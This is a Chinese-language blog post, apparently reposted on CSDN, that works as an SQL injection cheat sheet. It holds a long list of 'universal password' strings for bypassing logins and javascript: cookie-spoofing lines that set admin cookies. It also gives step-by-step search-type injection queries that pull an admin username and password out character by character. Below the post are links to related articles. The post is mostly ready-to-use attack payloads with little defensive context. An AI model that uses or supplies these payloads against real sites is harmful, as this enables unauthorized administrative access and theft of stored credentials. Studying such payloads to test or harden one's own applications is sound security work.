mysql 密码注入_数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入

最新推荐文章于 2023-07-12 18:39:44 发布
最新推荐文章于 2023-07-12 18:39:44 发布
阅读量572 收藏
点赞数
文章标签: mysql 密码注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33600816/article/details/113439700
版权

另类登录注入形式:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。

猜解思路可以构造,user_name: xxx'and password>'a 如果password第一位大于a,则继续user_name: xxx'and password>'b.

View Code

seelct * from admin where username='admin' and password=''注入方法:

万能用户名: xxx' union select * from users/*

select * from admin where username=admin and password=pass注入方法:

账户:777 密码:999 union select * from admin;

万能密码:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

用户名:admin'or'1'='1密码:'or'2'='2username:'or 1=1 or''=' passwd:随便写'or'='or'

'or''='

'or 1=1"or"="

'or 1=1/* php"or"a"="a"or 1=1--"or"="

"or"="a'='a"or1=1--"or=or"

''or'='or'

') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1'

'or''='

'or''=''or''=' !!!!!

'or'='1'

'or'='or'

'or.'a.'='a'or1=1--

1'or'1'='1a'or' 1=1--a'or'1=1--or'a'='a'or1=1--or1=1--

View Code

cookie注入:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

http://xxxx/view.asp?id=23先访问http://xxxx/view.asp?id=23接着在浏览器里输入:

javascript:alert(document.cookie="id="+escape("23 and 1=1"))

再访问http://xxxx/view.asp(未出错)

再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))

再访问:http://xxxx/view.asp(出错)

该页面出错就表示可以用Cookie注入。

View Code

cookie欺骗

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));

javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));

javascript:alert(document.cookie="admindj="+escape("1"));

然后login.asp改为admin_index.asp

搜索型注入

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

例如:

判断注入1%'and 1=1 and'%'='

1%'and 1=2 and'%'='判断是否存在表1%'and(select count(*)from admin)>0 and'%'='判断是否存在字段段1%'and(select top 1 len(username)from admin) and'%'='

1%'and(select top 1 len(password)from admin) and'%'='猜字段中的内容范围1%'and(select top 1 asc(mid(username,1,1))from admin)>102 and'%'='

1%'and(select top 1 asc(mid(username,1,1))from admin)>40 and'%'='

1%'and(select top 1 asc(mid(username,1,1))from admin)=97 and'%'='

1%'and(select top 1 asc(mid(username,2,1))from admin)=100 and'%'='

1%'and(select top 1 asc(mid(username,3,1))from admin)=109 and'%'='

1%'and(select top 1 asc(mid(username,4,1))from admin)=105 and'%'='

1%'and(select top 1 asc(mid(username,5,1))from admin)=110 and'%'='

1%'and(select top 1 asc(mid(password,1,1))from admin)=49 and'%'='

1%'and(select top 1 asc(mid(password,2,1))from admin)=52 and'%'='

1%'and(select top 1 asc(mid(password,3,1))from admin)=50 and'%'='

1%'and(select top 1 asc(mid(password,4,1))from admin)=49 and'%'='

1%'and(select top 1 asc(mid(password,5,1))from admin)=53 and'%'='

1%'and(select top 1 asc(mid(password,6,1))from admin)=68 and'%'='

1%'and(select top 1 asc(mid(password,7,1))from admin)=51 and'%'='

1%'and(select top 1 asc(mid(password,8,1))from admin)=49 and'%'='

1%'and(select top 1 asc(mid(password,9,1))from admin)=50 and'%'='

1%'and(select top 1 asc(mid(password,10,1))from admin)=49 and'%'='

1%'and(select top 1 asc(mid(password,11,1))from admin)=57 and'%'='

1%'and(select top 1 asc(mid(password,12,1))from admin)=52 and'%'='

1%'and(select top 1 asc(mid(password,13,1))from admin)=43 and'%'='

1%'and(select top 1 asc(mid(password,14,1))from admin)=51 and'%'='

1%'and(select top 1 asc(mid(password,15,1))from admin)=68 and'%'='

1%'and(select top 1 asc(mid(password,16,1))from admin)=51 and'%'='

View Code

超级简历WonderCV
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql.zip_MYSQL_mysql vc_mysql-vc_vc mysql
09-24
使用VC连接mysql数据库,新建表和相应的字段
mysql注入原理_mysql 注入原理以及防范
weixin_42372573的博客
02-28 568
一、注入原理通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令二、实例1、建表sqlCREATE TABLE `web_safe` ( `id` int unsigned NOT NULL AUTO_INCREMENT,`user_name` varchar(30) NOT NULL DEFAULT ” COMMENT ‘用户名’,`us...
MySql注入的基本了解
xf555er的博客
08-26 313
描述mysql的基本注入攻击, 给大家带来各种详细的攻击手段以及mysql语句的原理
WEB漏洞-SQL注入之报错盲注
ran的博客
01-16 602
内容包括导图、引论,SQL盲注的方法:报错盲注(insert报错盲注、update报错盲注、delete报错盲注)、时间盲注、布尔盲注,从基础内容开始,与实例结合,由浅到深的介绍了各种盲注方法的原理以及盲注过程,用到的实例包括pikachu、SQLi-LABS等,同时介绍了常用的SQL语句的用法,对盲注过程中用到的各种函数也进行了简单明了的介绍。
SQL注入
guoyuxin3的博客
11-28 225
万能密码 万能密码漏洞分析 基本知识: mysql注释的几种方式 1 单行注释可以用"#" 2 单行注释的第二种写法用 "-- " 注意这个风格下"--【空格】" 也就是说“--" 与注释之间是有空格的 3 多行注释可以用/**/ 举例 xxx' or 1# user_name=xxx' or 1#&user_pass=123123123 欢迎:111 第一种形式 'or'='or' 直...
【安全】SQL注入(未完)
ZhShy
01-14 504
1 SQL注入原理 用户名使用“ 'or 1=1–”登录,密码随意填写或不填 正常执行 select count(*) from admin where username='admin' and password='password' 输入特殊用户 select count(*) from admin where username=' ' or 1=1--'and password=' ' 此...
SQL注入基础
qq_51360929的博客
05-03 532
4.1 SQL注入的基础 4.1.1.介绍SQL注入 ​ SQL注入的指的是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是我们唯一可控的,因此我们可以让参数代入数据库查询,我们可以通过传入不同的SQL语句实现对数据库的操作。 ​ 一般情况下可对SQL语句进行选用,根据不同情况选择不同语句到达我们想要的效果。 4.1.2SQL注入原理 ​ 原理为通过对于SQL语句的巧妙构造来让我们的语句注入本不能达到的后端代码中 4.1.3 union攻击的具体实现以及分析 ​ 测试地址 127.0.0.
POST注入--万能密码(zkaq)
weixin_74410605的博客
07-12 789
入门简单的sql注入中的post注入,一键学会万能密码
mysql-server_8.0.25-1debian10.zip
07-09
MySQL 是世界上最流行的开源数据库。无论您是快速发展的网络资产、技术 ISV 还是大企业,MySQL 都可以经济高效地帮助您交付高性能、可扩展的数据库应用程序。 适用于Debian Linux 10 (x86, 64-bit) 压缩包内容: ...
adodb.zip_ACCESS数据库_access mysql_adodb mysql_adodb-time.inc.php
09-24
将access数据库数据插入mysql 数据库当中
注入总结之万能密码
06-15
适用的网络安全学习资源,PHP+MySql,ASP+Access,ASP+Ms Sql
MySQL数据库基础与实例教程-PPT课件.rar_MYSQL ppt_steppedrxg_数据库课件
07-15
这是一个mysql数据库基础与实例教程的ppt课件,里面有很多基础的数据库知识,对于初学者很有帮助
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
SQL加解密注入详解
永远是少年
07-25 1367
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL加解密注入。 一、SQL加解密注入原理 二、SQL加解密注入靶场逻辑介绍 三、SQL加解密注入实战
mysql 密码注入_简单sql注入密码爆破
weixin_42126274的博客
02-27 1327
简介:Day3的练习题和作业简单sql注入(自己搭建一个页面注入)页面搭建使用phpstudy,在WWW目录的index.php中进行代码修改在localhost界面下,即127.0.0.1打开默认显示index.php的页面该页面有如下要求:使用Post方法传递参数链接之前自己已生成的数据库字符注入页面,要求是post传递的参数,输入id,显示username,age,sex代码如下:1234...
SQL注入万能密码
热门推荐
qq_46172668的博客
07-09 2万+
SQL注入万能密码 SQL注入万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台 http://www. .com/admin/admin_login.asp 账号:djlfjdslajdfj(随意输入) 密码:1‘or’1’=‘1 1. 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。用户登录时,后台执行的数据库查询操作(SQL语句)是:【Selectuser_id,user_type,email From users Where us
mysql 密码注入_SQL注入原理——万能密码注入
weixin_32259855的博客
02-18 1524
万能密码】的原理用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Selectuser id,user type,email From users Where user id=’用户名’ And password=’密码’】由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名【a...
Mysql漏洞注入——万能密码
qq_66985187的博客
03-14 968
万能密码mysql绕过验证和web渗透测试
node-v12.20.1-sunos-x64.tar.xz
最新发布
04-27
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
sql手工注入漏洞测试(mysql数据库-字符)
06-28
在针对MySQL数据库的字符注入测试中,攻击者会尝试利用输入表单中的字符数据来破坏SQL语句的可靠性,进而获取对数据库的访问权限。 攻击者通常会使用一些SQL注入工具,例如SQLMap、Havij等,通过模拟输入表单来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值